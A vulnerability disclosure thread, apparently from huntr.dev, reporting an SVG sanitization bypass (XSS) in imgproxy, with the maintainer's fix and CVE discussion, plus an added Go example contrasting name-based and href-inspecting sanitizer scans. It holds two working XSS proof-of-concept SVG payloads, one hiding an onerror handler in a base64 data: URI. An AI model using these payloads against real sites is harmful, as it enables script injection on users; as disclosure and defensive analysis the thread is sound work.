SVG Sanitization Bypass - XSS in imgproxy/imgproxy

Valid

Reported on

Jan 12th 2023


Description

In the imgproxy application, we bypassed the SVG sanitization function. This way, an attacker can craft a malicious SVG file and run JavaScript on the application.

Proof of Concept

Here is the content of the malicious svg file.

<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'>
<image href="1" onerror="alert(1)" />
</svg>

After that, you can request this SVG file as below.

http://127.0.0.1:8080/unsafe/plain/<svg-file-url>/test.svg

Impact

This way, an attacker can craft a malicious SVG file and run JavaScript on the application.

We are processing your report and will contact the imgproxy team within 24 hours. 4 months ago
Emre Durmaz
4 months ago

Researcher


Hi again,

We realized that your latest commit prevents this payload in the latest version. So this vulnerability report is valid for version v3.12.0. :)

https://github.com/imgproxy/imgproxy/blob/f89ced23e49a834f2e7c40862597d24774416396/svg/svg.go#L30

We created a GitHub Issue asking the maintainers to create a SECURITY.md 4 months ago
Emre Durmaz
4 months ago

Researcher


Hi again,

We also bypassed the latest version.

https://github.com/imgproxy/imgproxy/blob/master/svg/svg.go#L30

PoC Payload

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <use xlink:href="data:application/xml;base64 ,
PHN2ZyBpZD0ndGVzdCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==#test"/>
</svg>

http://127.0.0.1:8080/unsafe/plain/<svg-file-url>/test.svg

Code (from svg/svg.go, linked above)

case xml.StartTagToken:
	if strings.ToLower(string(l.Text())) == "script" {
		ignoreTag++
		continue
	}
	buf.Write(tdata)
case xml.AttributeToken:
	if _, unsafe := unsafeAttrs[strings.ToLower(string(l.Text()))]; unsafe {
		continue
	}
	buf.Write(tdata)
Emre Durmaz modified the report
4 months ago
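The svg.go snippet quoted in the comment above only compares tag names and attribute names, never attribute values, which is why the base64 data: URI inside the <use> payload passes through untouched: the tokenizer sees an attribute named xlink:href and nothing else. The Go program below is an added example written for this page; it is not imgproxy's code and not the fix the maintainer shipped in commit 62f8d08. It rebuilds both PoC payloads from the report, runs a name-based scan that mirrors the page's logic, and then an href-inspecting scan that treats a data: URI in href/xlink:href as unsafe, decodes it and rescans the embedded document, where the onerror handler turns up. The unsafeAttrs entries, the function names and the href-inspection rule are this example's own assumptions.

```go
package main

import (
	"encoding/base64"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// A finding is one token the filter would drop (or, with href inspection on,
// one token found inside an embedded data: document). Depth 0 is the document
// handed to the sanitizer; depth 1 is a document hidden in a data: URI.
type finding struct {
	Kind  string // "tag" or "attr"
	Name  string
	Depth int
}

// Name-based denylist, in the spirit of the svg.go snippet on this page.
// The entries are an assumption for this example; imgproxy's list may differ.
var unsafeAttrs = map[string]struct{}{
	"onload": {}, "onerror": {}, "onclick": {}, "onmouseover": {}, "onbegin": {},
}

// First PoC from the report: the handler is a plain attribute name, so a
// name-based filter catches it.
const payloadImage = `<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'>
<image href="1" onerror="alert(1)" />
</svg>`

// Second PoC from the report, rebuilt here (constructed, not copied): the same
// inner document is base64-encoded into a data: URI referenced from <use>.
// The outer tokenizer only ever sees an attribute named xlink:href.
func buildUsePayload() string {
	inner := strings.Replace(payloadImage, "id='x'", "id='test'", 1)
	b64 := base64.StdEncoding.EncodeToString([]byte(inner))
	return `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">` +
		`<use xlink:href="data:application/xml;base64,` + b64 + `#test"/></svg>`
}

var payloadUse = buildUsePayload()

// decodeDataURI returns the document carried by a data: URI and true, or
// ("", false) when the value is not a data: URI. A fragment suffix such as
// "#test" is stripped before decoding. Only the base64 form is decoded; the
// percent-encoded form is returned as-is, which is enough for this example.
func decodeDataURI(v string) (string, bool) {
	v = strings.TrimSpace(v)
	if !strings.HasPrefix(strings.ToLower(v), "data:") {
		return "", false
	}
	comma := strings.IndexByte(v, ',')
	if comma < 0 {
		return "", true // malformed, but still a data: URI and still worth refusing
	}
	meta := strings.ToLower(strings.TrimSpace(v[len("data:"):comma]))
	payload := strings.TrimSpace(v[comma+1:])
	if i := strings.IndexByte(payload, '#'); i >= 0 {
		payload = payload[:i]
	}
	if !strings.HasSuffix(meta, ";base64") {
		return payload, true
	}
	raw, err := base64.StdEncoding.DecodeString(payload)
	if err != nil {
		return "", true
	}
	return string(raw), true
}

// scan walks the document's start tags. With inspectHref false it behaves
// like the page's filter: only tag names and attribute names are examined.
// With inspectHref true it also flags a data: URI in href/xlink:href and
// rescans the embedded document. The href rule is this example's hardening
// idea (an assumption), not the fix imgproxy shipped.
func scan(doc string, inspectHref bool, depth int) ([]finding, error) {
	dec := xml.NewDecoder(strings.NewReader(doc))
	var out []finding
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return out, nil
		}
		if err != nil {
			return out, err
		}
		se, ok := tok.(xml.StartElement)
		if !ok {
			continue
		}
		if strings.EqualFold(se.Name.Local, "script") {
			out = append(out, finding{"tag", "script", depth})
		}
		for _, a := range se.Attr {
			name := strings.ToLower(a.Name.Local) // "href" for both href and xlink:href
			if _, bad := unsafeAttrs[name]; bad {
				out = append(out, finding{"attr", name, depth})
				continue
			}
			if !inspectHref || name != "href" {
				continue
			}
			inner, isData := decodeDataURI(a.Value)
			if !isData {
				continue
			}
			out = append(out, finding{"attr", "href=data:", depth})
			nested, err := scan(inner, inspectHref, depth+1)
			if err != nil {
				return out, err
			}
			out = append(out, nested...)
		}
	}
}

// hasFinding reports whether the scan flagged a given token at a given depth.
func hasFinding(fs []finding, kind, name string, depth int) bool {
	for _, f := range fs {
		if f.Kind == kind && f.Name == name && f.Depth == depth {
			return true
		}
	}
	return false
}

func main() {
	for _, p := range []struct{ label, doc string }{{"image PoC", payloadImage}, {"use PoC", payloadUse}} {
		for _, inspect := range []bool{false, true} {
			fs, err := scan(p.doc, inspect, 0)
			fmt.Printf("%-9s inspectHref=%-5v findings=%v err=%v\n", p.label, inspect, fs, err)
		}
	}
}
```

Running it shows the asymmetry the report relies on: the name-based pass flags onerror in the first payload but returns nothing for the <use> payload, while the href-inspecting pass flags the data: URI at depth 0 and the onerror handler at depth 1. A sanitizer that must keep <use> working can restrict href to same-document fragment references (values starting with "#") instead of decoding data: URIs; either way the decision has to be made on the attribute value, not the name.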
We have opened a pull request with a SECURITY.md for imgproxy to merge. 4 months ago
Emre Durmaz
4 months ago

Researcher


Hi there,

Regarding this issue, they requested that the vulnerability be reported via e-mail. Will you send an e-mail or shall we send an e-mail?

We have contacted a member of the imgproxy team and are waiting to hear back 3 months ago
imgproxy/imgproxy maintainer
3 months ago

Maintainer


Hi Emre!

Thanks for catching this! I added the fix with https://github.com/imgproxy/imgproxy/commit/62f8d08a93d301285dcd1dabcc7ba10c6c65b689

Also, imgproxy sets the Content-Security-Policy header since v3.13.0, so this vulnerability shouldn't work if the browser respects Content-Security-Policy.

Emre Durmaz
3 months ago

Researcher


Hi there,

Thanks for the fix. Can you set this report as resolved?

Regards

imgproxy/imgproxy maintainer validated this vulnerability 3 months ago
Emre Durmaz has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Emre Durmaz
3 months ago

Researcher


Hi huntr.dev team,

How can we get CVE?

Can you help with CVE?

Regards

Ben Harvie
3 months ago

Admin


CVE assignment is in the hands of the maintainer at the fix and publish stage of the report, please request this from the maintainer, rather than admins, thanks!

imgproxy/imgproxy maintainer marked this as fixed in 3.14.0 with commit 62f8d0 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
imgproxy/imgproxy maintainer published this vulnerability 2 months ago